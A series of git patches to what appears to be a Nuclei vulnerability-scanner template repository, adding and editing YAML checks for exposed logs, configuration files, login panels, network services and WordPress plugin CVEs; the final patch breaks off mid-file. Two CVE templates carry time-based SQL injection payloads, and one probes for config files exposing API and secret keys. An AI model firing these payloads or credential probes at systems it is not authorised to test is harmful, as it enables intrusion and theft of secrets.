part: header + + - type: status + status: + - 401 From 4a88b7c420cc69d46306f0493a30bf56f61bc62c Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Sun, 4 Dec 2022 16:51:21 +0000 Subject: [PATCH 0063/1133] Update error-logs.yaml --- exposures/logs/error-logs.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index 1ff6ed782a..2d7fa5d6d2 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -2,13 +2,14 @@ id: error-logs info: name: common error log files - author: geeknik,daffainfo,ELSFA7110 + author: geeknik,daffainfo,ELSFA7110,Hardik-Solanki severity: low tags: logs,exposure,error requests: - method: GET path: + - "{{BaseURL}}/php_errors.log" - "{{BaseURL}}/MyErrors.log" - "{{BaseURL}}/admin/error.log" - "{{BaseURL}}/admin/errors.log" From 5a9a185e10cfff6e7003bbfd588e1789ed62736a Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Sun, 4 Dec 2022 17:10:51 +0000 Subject: [PATCH 0064/1133] Create ws-ftp-log.yaml --- exposures/logs/ws-ftp-log.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposures/logs/ws-ftp-log.yaml diff --git a/exposures/logs/ws-ftp-log.yaml b/exposures/logs/ws-ftp-log.yaml new file mode 100644 index 0000000000..5b5e0d7dcf --- /dev/null +++ b/exposures/logs/ws-ftp-log.yaml @@ -0,0 +1,32 @@ +id: ws-ftp-log + +info: + name: WS FTP File Disclosure + author: Hardik-Solanki + severity: low + metadata: + verified: true + google-query: intitle:"Index of" ws_ftp.log + tags: exposure,ftp,files + +requests: + - method: GET + path: + - '{{BaseURL}}/ws_ftp.log' + - '{{BaseURL}}/WS_FTP.LOG' + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words:\ + - 'C:\' + - 'D:\' + condition: or + + - type: status + status: + - 200 From b2abf6f80f71adeeb7a006121b148ffc4c44cb0c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sun, 4 Dec 2022 22:43:39 +0530 Subject: [PATCH 0065/1133] Update ws-ftp-log.yaml --- exposures/logs/ws-ftp-log.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/logs/ws-ftp-log.yaml b/exposures/logs/ws-ftp-log.yaml index 5b5e0d7dcf..730ce522fc 100644 --- a/exposures/logs/ws-ftp-log.yaml +++ b/exposures/logs/ws-ftp-log.yaml @@ -13,17 +13,17 @@ requests: - method: GET path: - '{{BaseURL}}/ws_ftp.log' - - '{{BaseURL}}/WS_FTP.LOG' + - '{{BaseURL}}/WS_FTP.LOG' stop-at-first-match: true - host-redirects: true + host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words:\ - - 'C:\' + - 'C:\' - 'D:\' condition: or From 6a768cf6e082df4fdd5d2a8198e4d9aa791b10c4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sun, 4 Dec 2022 22:45:24 +0530 Subject: [PATCH 0066/1133] Update ws-ftp-log.yaml --- exposures/logs/ws-ftp-log.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/ws-ftp-log.yaml b/exposures/logs/ws-ftp-log.yaml index 730ce522fc..6915e54c38 100644 --- a/exposures/logs/ws-ftp-log.yaml +++ b/exposures/logs/ws-ftp-log.yaml @@ -22,7 +22,7 @@ requests: matchers: - type: word part: body - words:\ + words: - 'C:\' - 'D:\' condition: or From 8f4fbea711c44b06ae24fb4aa6efdd7a65705775 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 00:24:30 +0530 Subject: [PATCH 0067/1133] Create gradle-libs.yaml --- exposures/files/gradle-libs.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposures/files/gradle-libs.yaml diff --git a/exposures/files/gradle-libs.yaml b/exposures/files/gradle-libs.yaml new file mode 100644 index 0000000000..5cd6243e8f --- /dev/null +++ b/exposures/files/gradle-libs.yaml @@ -0,0 +1,31 @@ +id: gradle-libs + +info: + name: Gradle libs.versions.toml Disclosure + author: DhiyaneshDK + severity: low + metadata: + verified: true + github-query: filename:libs.versions.toml + tags: file,gradle + +requests: + - method: GET + path: + - '{{BaseURL}}/gradle/libs.versions.toml' + - '{{BaseURL}}/libs.versions.toml' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "[versions]" + - "[libraries]" + - "[bundles]" + condition: and + + - type: status + status: + - 200 From f730651ca57377a3e19aa8f98effcc1c1e41eb78 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 00:32:37 +0530 Subject: [PATCH 0068/1133] Update ws-ftp-log.yaml --- exposures/logs/ws-ftp-log.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/exposures/logs/ws-ftp-log.yaml b/exposures/logs/ws-ftp-log.yaml index 6915e54c38..965e4ef999 100644 --- a/exposures/logs/ws-ftp-log.yaml +++ b/exposures/logs/ws-ftp-log.yaml @@ -16,8 +16,6 @@ requests: - '{{BaseURL}}/WS_FTP.LOG' stop-at-first-match: true - host-redirects: true - max-redirects: 2 matchers-condition: and matchers: - type: word From 0efd2ff18ab42a6506a47cbef14f7a1294d81c7f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 00:33:13 +0530 Subject: [PATCH 0069/1133] Update ws-ftp-log.yaml --- exposures/logs/ws-ftp-log.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/ws-ftp-log.yaml b/exposures/logs/ws-ftp-log.yaml index 965e4ef999..cbc81003d9 100644 --- a/exposures/logs/ws-ftp-log.yaml +++ b/exposures/logs/ws-ftp-log.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true google-query: intitle:"Index of" ws_ftp.log - tags: exposure,ftp,files + tags: exposure,ftp,logs requests: - method: GET From bb4f42796f3da68db25e7680790b3695cc300518 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 5 Dec 2022 11:31:29 +0530 Subject: [PATCH 0070/1133] Update CVE-2022-0826.yaml --- cves/2022/CVE-2022-0826.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-0826.yaml b/cves/2022/CVE-2022-0826.yaml index 15f724ac96..5a0f8b52c0 100644 --- a/cves/2022/CVE-2022-0826.yaml +++ b/cves/2022/CVE-2022-0826.yaml @@ -16,8 +16,8 @@ info: cve-id: CVE-2022-0826 cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-video-gallery-free,unauth + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-video-gallery-free,unauth requests: - raw: @@ -28,11 +28,12 @@ requests: Content-Type: application/x-www-form-urlencoded action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523 + matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "text/html")' - - '(contains(body, "Registred videos :") || contains(body, "duplicate"))' - condition: and \ No newline at end of file + - 'contains(body, "Registred videos :")' + condition: and From e444caba63df219787115ca14ca2d9042799fd29 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 11:59:42 +0530 Subject: [PATCH 0071/1133] Create finger-detect.yaml --- network/detection/finger-detect.yaml | 29 ++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 network/detection/finger-detect.yaml diff --git a/network/detection/finger-detect.yaml b/network/detection/finger-detect.yaml new file mode 100644 index 0000000000..3216d42d83 --- /dev/null +++ b/network/detection/finger-detect.yaml @@ -0,0 +1,29 @@ +id: finger-detect + +info: + name: Finger Daemon Detection + author: DhiyaneshDK + severity: info + description: | + The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. + metadata: + verified: true + shodan-query: port:"79" action + tags: network,finger + +network: + - inputs: + - data: "\n" + + host: + - "{{Hostname}}" + - "{{Host}}:79" + + matchers: + - type: word + part: body + words: + - "User" + - "Action" + - "Node" + condition: and From 976dde4a7ff53fa404b5ae755fd601bf47147b0d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 13:12:28 +0530 Subject: [PATCH 0072/1133] Create rpcbind-portmapper-detect.yaml --- .../detection/rpcbind-portmapper-detect.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 network/detection/rpcbind-portmapper-detect.yaml diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml new file mode 100644 index 0000000000..a8a6be522e --- /dev/null +++ b/network/detection/rpcbind-portmapper-detect.yaml @@ -0,0 +1,22 @@ +id: rpcbind-portmapper-detect + +info: + name: RPCBind Portmapper Detection + author: geeknik + severity: info + reference: https://book.hacktricks.xyz/pentesting/pentesting-rpcbind + tags: network,rpcbind,portmap + +network: + - inputs: + - data: 8000002836ed646d0000000000000002000186a0000000040000000400000000000000000000000000000000 + type: hex + + host: + - "{{Hostname}}" + - "{{Host}}:111" + + matchers: + - type: word + words: + - "/run/rpcbind.sock" From c7084c9f6dbb8da81d762032caf40c6a289cf332 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 5 Dec 2022 14:33:06 +0530 Subject: [PATCH 0073/1133] Update pega-web-panel.yaml --- exposed-panels/pega-web-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/pega-web-panel.yaml b/exposed-panels/pega-web-panel.yaml index 8a34f22be9..d6458abe6c 100644 --- a/exposed-panels/pega-web-panel.yaml +++ b/exposed-panels/pega-web-panel.yaml @@ -17,8 +17,8 @@ info: requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/prweb/PRAuth/app/default/" - - "{{BaseURL}}/prweb" host-redirects: true max-redirects: 2 From a973a916d60f3f6d1a15f011c359875202ad1899 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 15:43:30 +0530 Subject: [PATCH 0074/1133] Create config-json.yaml --- exposures/configs/config-json.yaml | 32 ++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposures/configs/config-json.yaml diff --git a/exposures/configs/config-json.yaml b/exposures/configs/config-json.yaml new file mode 100644 index 0000000000..7c28d4c2ed --- /dev/null +++ b/exposures/configs/config-json.yaml @@ -0,0 +1,32 @@ +id: config-json + +info: + name: Config File Exposure + author: geeknik + severity: high + metadata: + verified: true + github-query: filename:config.json + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/config/default.json" + - "{{BaseURL}}/config.json" + - "{{BaseURL}}/config/config.json" + - "{{BaseURL}}/credentials/config.json" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - '"api_keys":' + - '"accessKey":' + - '"secretKey":' + condition: or + + - type: status + status: + - 200 From 2fb6ca231f152063c2df85073201d9618bd08774 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 5 Dec 2022 17:23:26 +0530 Subject: [PATCH 0075/1133] Update CVE-2022-0948.yaml --- cves/2022/CVE-2022-0948.yaml | 25 +++++++++++-------------- 1 file changed, 11 insertions(+), 14 deletions(-) diff --git a/cves/2022/CVE-2022-0948.yaml b/cves/2022/CVE-2022-0948.yaml index a5199a57ff..cbc5707004 100644 --- a/cves/2022/CVE-2022-0948.yaml +++ b/cves/2022/CVE-2022-0948.yaml @@ -11,20 +11,13 @@ info: - https://wordpress.org/plugins/woc-order-alert/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0948 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-0948 - cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,woc-order-alert,unauth + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,woc-order-alert,unauth requests: - raw: - - | - GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1 - Host: {{Hostname}} - - | @timeout: 15s POST /?rest_route=/olistener/new HTTP/1.1 @@ -33,12 +26,16 @@ requests: {"id":" (SLEEP(6))#"} + - | + GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1 + Host: {{Hostname}} + req-condition: true matchers: - type: dsl dsl: - - 'duration_2>=6' - - 'status_code_2 == 200' - - 'contains(content_type_2, "application/json")' - - 'contains(body_1, "olistener-action.olistener-controller")' - condition: and \ No newline at end of file + - 'duration_1>=6' + - 'status_code_1 == 200' + - 'contains(content_type_1, "application/json")' + - 'contains(body_2, "olistener-action.olistener-controller")' + condition: and From 90e04901e8924a9fc54ade2f0486d49409ce9348 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 17:30:14 +0530 Subject: [PATCH 0076/1133] Update elasticsearch.yaml --- misconfiguration/elasticsearch.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/misconfiguration/elasticsearch.yaml b/misconfiguration/elasticsearch.yaml index 32aaf22f15..3da231754e 100644 --- a/misconfiguration/elasticsearch.yaml +++ b/misconfiguration/elasticsearch.yaml @@ -2,8 +2,11 @@ id: elasticsearch info: name: ElasticSearch Information Disclosure - author: Shine,c-sh0 + author: Shine,c-sh0,geeknik severity: low + metadata: + verified: true + shodan-query: "ElasticSearch" tags: elastic,unauth,elasticsearch requests: @@ -12,6 +15,7 @@ requests: - '{{BaseURL}}/?pretty' - '{{BaseURL}}/_cat/indices?v' - '{{BaseURL}}/_all/_search' + - "{{BaseURL}}/_cluster/health?pretty" stop-at-first-match: true matchers-condition: and @@ -20,6 +24,7 @@ requests: words: - '"took":' - '"number" :' + - '"number_of_nodes" :' condition: or - type: status From 783183057959cc93f65aaae2997566fbc9e88404 Mon Sep 17 00:00:00 2001 From: meme <meme@localhost> Date: Mon, 5 Dec 2022 16:33:45 +0300 Subject: [PATCH 0077/1133] Updated openapi template --- exposures/apis/openapi.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposures/apis/openapi.yaml b/exposures/apis/openapi.yaml index 3b4952d152..5348998d50 100644 --- a/exposures/apis/openapi.yaml +++ b/exposures/apis/openapi.yaml @@ -2,7 +2,7 @@ id: openapi info: name: OpenAPI - author: pdteam + author: pdteam,ynnirc severity: info tags: exposure,api @@ -10,12 +10,14 @@ requests: - method: GET path: - "{{BaseURL}}/openapi.json" + - "{{BaseURL}}/swagger.json" matchers-condition: and matchers: - type: word words: - application/openapi+json + - application/json part: header - type: word From 7192933fc59517af31f9ef0f07353f16fb0c2686 Mon Sep 17 00:00:00 2001 From: Aman Rawat <rawataman6525@gmail.com> Date: Mon, 5 Dec 2022 19:31:47 +0530 Subject: [PATCH 0078/1133] Created template MetaView Explorer Installer --- .../metaview-explorer-installer.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/metaview-explorer-installer.yaml diff --git a/exposed-panels/metaview-explorer-installer.yaml b/exposed-panels/metaview-explorer-installer.yaml new file mode 100644 index 0000000000..197b2f31cf --- /dev/null +++ b/exposed-panels/metaview-explorer-installer.yaml @@ -0,0 +1,28 @@ +id: metaview-explorer-installer + +info: + name: MetaView Explorer (InstallAnywhere Web Installer) + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"MetaView Explorer" + tags: metaview-explorer, installer + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>MetaView Explorer' + - '(InstallAnywhere Web Installer)' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 49c7157726679564a5493e76aff5dcee62ebbc6b Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Mon, 5 Dec 2022 20:02:34 +0530 Subject: [PATCH 0079/1133] Created template mag-dashboard-login --- exposed-panels/mag-dashboard-login.yaml | 29 +++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/mag-dashboard-login.yaml diff --git a/exposed-panels/mag-dashboard-login.yaml b/exposed-panels/mag-dashboard-login.yaml new file mode 100644 index 0000000000..7d137b91e6 --- /dev/null +++ b/exposed-panels/mag-dashboard-login.yaml @@ -0,0 +1,29 @@ +id: mag-dashboard-login + +info: + name: MAG Dashboard Login + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"MAG Dashboard Login" + tags: mag-dashboard, login + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/mag/' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'MAG Dashboard Login' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 4faa5eb09cc2b2d1a4b06c235acb55cd8d8d4655 Mon Sep 17 00:00:00 2001 From: Aman Rawat <rawataman6525@gmail.com> Date: Mon, 5 Dec 2022 20:04:03 +0530 Subject: [PATCH 0080/1133] Created template netris-dashboard-login --- exposed-panels/netris-dashboard-login.yaml | 29 ++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/netris-dashboard-login.yaml diff --git a/exposed-panels/netris-dashboard-login.yaml b/exposed-panels/netris-dashboard-login.yaml new file mode 100644 index 0000000000..869b823b08 --- /dev/null +++ b/exposed-panels/netris-dashboard-login.yaml @@ -0,0 +1,29 @@ +id: netris-dashboard-login + +info: + name: Netris Dashboard + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"Netris Dashboard" + tags: netris-dashboard, login + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/login' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>Netris Dashboard' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 59194f44195d042e1866881874fc5bf6cc8f8d4a Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Mon, 5 Dec 2022 20:05:29 +0530 Subject: [PATCH 0081/1133] Created template aircube-dashboard-login --- exposed-panels/aircube-dashboard-login.yaml | 29 +++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/aircube-dashboard-login.yaml diff --git a/exposed-panels/aircube-dashboard-login.yaml b/exposed-panels/aircube-dashboard-login.yaml new file mode 100644 index 0000000000..06fece3136 --- /dev/null +++ b/exposed-panels/aircube-dashboard-login.yaml @@ -0,0 +1,29 @@ +id: aircube-dashboard-login + +info: + name: Netris Dashboard + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"AirCube Dashboard" + tags: aircube-dashboard, login + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/#/login' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'AirCube Dashboard' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From bf97fd1f5944412416a4fdf0d6a84b9c732765e2 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Mon, 5 Dec 2022 20:08:45 +0530 Subject: [PATCH 0082/1133] Updated --- exposed-panels/aircube-dashboard-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/aircube-dashboard-login.yaml b/exposed-panels/aircube-dashboard-login.yaml index 06fece3136..613f96fcc5 100644 --- a/exposed-panels/aircube-dashboard-login.yaml +++ b/exposed-panels/aircube-dashboard-login.yaml @@ -1,7 +1,7 @@ id: aircube-dashboard-login info: - name: Netris Dashboard + name: AirCube Dashboard author: theamanrawat severity: info metadata: From 8c4e9c1d1d356c7db6cfd888b70456e64b288957 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Dec 2022 22:32:39 +0530 Subject: [PATCH 0083/1133] Update and rename exposed-panels/metaview-explorer-installer.yaml to misconfiguration/installer/metaview-explorer-installer.yaml --- .../installer}/metaview-explorer-installer.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) rename {exposed-panels => misconfiguration/installer}/metaview-explorer-installer.yaml (64%) diff --git a/exposed-panels/metaview-explorer-installer.yaml b/misconfiguration/installer/metaview-explorer-installer.yaml similarity index 64% rename from exposed-panels/metaview-explorer-installer.yaml rename to misconfiguration/installer/metaview-explorer-installer.yaml index 197b2f31cf..3bc3636a64 100644 --- a/exposed-panels/metaview-explorer-installer.yaml +++ b/misconfiguration/installer/metaview-explorer-installer.yaml @@ -1,13 +1,13 @@ id: metaview-explorer-installer info: - name: MetaView Explorer (InstallAnywhere Web Installer) + name: MetaView Explorer Installer author: theamanrawat severity: info metadata: verified: true shodan-query: http.title:"MetaView Explorer" - tags: metaview-explorer, installer + tags: metaview,installer requests: - method: GET @@ -19,10 +19,10 @@ requests: - type: word part: body words: - - 'MetaView Explorer' - - '(InstallAnywhere Web Installer)' + - 'MetaView Explorer' + - '(InstallAnywhere Web Installer)' condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From f4f850127dfbc6faa8f3146e104b1023f2d36911 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Dec 2022 22:33:02 +0530 Subject: [PATCH 0084/1133] Update metaview-explorer-installer.yaml --- misconfiguration/installer/metaview-explorer-installer.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/installer/metaview-explorer-installer.yaml b/misconfiguration/installer/metaview-explorer-installer.yaml index 3bc3636a64..c3b302b70a 100644 --- a/misconfiguration/installer/metaview-explorer-installer.yaml +++ b/misconfiguration/installer/metaview-explorer-installer.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"MetaView Explorer" - tags: metaview,installer + tags: metaview,installer,misconfig requests: - method: GET From 1cc6bc9e8bfb58c9656d4c2748382391d6d9cece Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Dec 2022 22:39:57 +0530 Subject: [PATCH 0085/1133] Update mag-dashboard-login.yaml --- exposed-panels/mag-dashboard-login.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/exposed-panels/mag-dashboard-login.yaml b/exposed-panels/mag-dashboard-login.yaml index 7d137b91e6..90c662d403 100644 --- a/exposed-panels/mag-dashboard-login.yaml +++ b/exposed-panels/mag-dashboard-login.yaml @@ -7,23 +7,24 @@ info: metadata: verified: true shodan-query: http.title:"MAG Dashboard Login" - tags: mag-dashboard, login + tags: panel,mag requests: - method: GET path: - '{{BaseURL}}' - - '{{BaseURL}}/mag/' - stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - - 'MAG Dashboard Login' + - 'MAG Dashboard Login' + - 'Check for Renewal License' condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From e02be7528a8b24e2bc545938ddcc0f6ad8ac7d5d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 5 Dec 2022 22:49:04 +0530 Subject: [PATCH 0086/1133] Update and rename netris-dashboard-login.yaml to netris-dashboard-panel.yaml --- ...ard-login.yaml => netris-dashboard-panel.yaml} | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) rename exposed-panels/{netris-dashboard-login.yaml => netris-dashboard-panel.yaml} (62%) diff --git a/exposed-panels/netris-dashboard-login.yaml b/exposed-panels/netris-dashboard-panel.yaml similarity index 62% rename from exposed-panels/netris-dashboard-login.yaml rename to exposed-panels/netris-dashboard-panel.yaml index 869b823b08..5d501c8304 100644 --- a/exposed-panels/netris-dashboard-login.yaml +++ b/exposed-panels/netris-dashboard-panel.yaml @@ -1,29 +1,30 @@ -id: netris-dashboard-login +id: netris-dashboard-panel info: - name: Netris Dashboard + name: Netris Dashboard Panel author: theamanrawat severity: info metadata: verified: true shodan-query: http.title:"Netris Dashboard" - tags: netris-dashboard, login + tags: panel,netris requests: - method: GET path: - '{{BaseURL}}' - - '{{BaseURL}}/login' - stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and matchers: - type: word part: body words: - - '<title>Netris Dashboard' + - 'Netris Dashboard' condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From f267553f8d86e01a5b76af72c6d23c6188897a9d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Dec 2022 22:49:21 +0530 Subject: [PATCH 0087/1133] Update netris-dashboard-panel.yaml --- exposed-panels/netris-dashboard-panel.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/netris-dashboard-panel.yaml b/exposed-panels/netris-dashboard-panel.yaml index 5d501c8304..a6c1277976 100644 --- a/exposed-panels/netris-dashboard-panel.yaml +++ b/exposed-panels/netris-dashboard-panel.yaml @@ -23,7 +23,6 @@ requests: part: body words: - 'Netris Dashboard' - condition: and - type: status status: From 71ccb4d8cb8714039e0e19e23a2026ca22eabda9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Dec 2022 22:54:03 +0530 Subject: [PATCH 0088/1133] Update and rename aircube-dashboard-login.yaml to aircube-dashboard-panel --- ...dashboard-login.yaml => aircube-dashboard-panel} | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) rename exposed-panels/{aircube-dashboard-login.yaml => aircube-dashboard-panel} (57%) diff --git a/exposed-panels/aircube-dashboard-login.yaml b/exposed-panels/aircube-dashboard-panel similarity index 57% rename from exposed-panels/aircube-dashboard-login.yaml rename to exposed-panels/aircube-dashboard-panel index 613f96fcc5..500db3ae8b 100644 --- a/exposed-panels/aircube-dashboard-login.yaml +++ b/exposed-panels/aircube-dashboard-panel @@ -1,29 +1,26 @@ -id: aircube-dashboard-login +id: aircube-dashboard-panel info: - name: AirCube Dashboard + name: AirCube Dashboard Panel author: theamanrawat severity: info metadata: verified: true shodan-query: http.title:"AirCube Dashboard" - tags: aircube-dashboard, login + tags: panel,aircube requests: - method: GET path: - '{{BaseURL}}' - - '{{BaseURL}}/#/login' - stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - 'AirCube Dashboard' - condition: and + - 'AirCube Dashboard' - type: status status: - - 200 \ No newline at end of file + - 200 From 39c69cc7531e2efab44d7250101c9f2d685f7b4f Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 6 Dec 2022 00:11:19 +0530 Subject: [PATCH 0089/1133] Add files via upload --- network/detection/redis-detect.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 network/detection/redis-detect.yaml diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml new file mode 100644 index 0000000000..72073fa44a --- /dev/null +++ b/network/detection/redis-detect.yaml @@ -0,0 +1,27 @@ +id: redis-detect + +info: + name: Redis Detection + author: pussycat0x + severity: info + metadata: + verified: true + shodan-query: product:"redis" + tags: network,redis,unauth + +network: + - inputs: + - data: "*1\r\n$4\r\ninfo\r\n" + + host: + - "{{Hostname}}" + - "{{Host}}:6379" + read-size: 1024 + + matchers: + - type: word + words: + - "DENIED Redis" + - "CONFIG REWRITE" + - "NOAUTH Authentication" + condition: or From 16372e3ed0810c9c6fee2075d7fae66cc17c78fe Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 6 Dec 2022 00:14:56 +0530 Subject: [PATCH 0090/1133] Update redis-detect.yaml --- network/detection/redis-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml index 72073fa44a..ac536804b3 100644 --- a/network/detection/redis-detect.yaml +++ b/network/detection/redis-detect.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: product:"redis" - tags: network,redis,unauth + tags: network,redis network: - inputs: @@ -24,4 +24,4 @@ network: - "DENIED Redis" - "CONFIG REWRITE" - "NOAUTH Authentication" - condition: or + condition: or From 04a9e65113b47f2f6dc1e6f053065d9ca54537a1 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 6 Dec 2022 08:32:40 +0900 Subject: [PATCH 0091/1133] Create CVE-2019-6802.yaml --- CVE-2019-6802.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 CVE-2019-6802.yaml diff --git a/CVE-2019-6802.yaml b/CVE-2019-6802.yaml new file mode 100644 index 0000000000..a9848720e7 --- /dev/null +++ b/CVE-2019-6802.yaml @@ -0,0 +1,26 @@ +id: CVE-2019-6802 + +info: + name: CRLF Injection in pypiserver 1.2.5 + author: 0x_Akoko + severity: medium + description: CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI + reference: + - 